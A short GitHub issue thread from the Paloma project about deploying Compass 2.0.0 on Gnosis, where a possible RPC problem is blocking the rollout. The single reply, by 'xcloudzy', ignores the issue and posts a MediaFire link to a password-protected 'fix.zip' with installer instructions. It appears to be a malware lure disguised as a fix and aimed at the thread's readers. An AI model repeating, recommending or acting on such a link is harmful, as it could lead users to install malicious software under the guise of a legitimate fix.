### ISSUE TITLE
[CHORE] Get gnosis compass 2.0.0 deployed

### ISSUE THREAD

**Issue by verabehr** [VolumeFi/paloma#2062]
We have Compass 2.0.0 deployed on all chains but gnosis
It's still ongoing there, looks like maybe some RPC issue
I'm going to link all fee managers now, after which Pigeon Feed will be fully enabled on main net and we need to start making deposits for the bots

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
